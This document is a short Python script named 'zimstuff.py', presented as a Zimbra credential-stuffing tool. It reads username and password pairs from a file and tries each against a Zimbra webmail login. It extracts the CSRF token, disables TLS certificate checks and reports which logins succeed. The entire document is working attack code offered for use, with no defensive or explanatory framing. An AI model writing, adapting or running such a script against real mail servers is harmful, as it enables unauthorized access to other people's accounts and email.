Zimbra Cred Stuff

zimstuff.py

from termcolor import colored
import sys
import requests
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

#creds.txt in this format:
#mylogin 12345
#otherlogin 54321
#...
def readCreds(fpath):
    d = {}
    with open(fpath, "r") as f:
        for line in f:
            (key, val) = line.split()
            d[key] = val
    return d

URL = 'https://correo.mydomain.com'

d = readCreds("creds.txt")
for username, password in d.items():
    print(colored("[+] Trying login > {}:{}".format(username, password), "blue"))
    client = requests.session()
    
    client.get(URL, verify=False)
    if 'ZM_LOGIN_CSRF' in client.cookies:
        csrftoken = client.cookies['ZM_LOGIN_CSRF']

    login_data = dict(loginOp="login", login_csrf=csrftoken, username=username, password=password, client="preferred")
    r = client.post(URL, data=login_data, headers=dict(Referer=URL), verify=False)

    if(b"The username or password is incorrect" not in r.content):
        print(colored("[+] ACCESS GRANTED", "green"))
    else:
        print(colored("[-] ACCESS DENIED", "red"))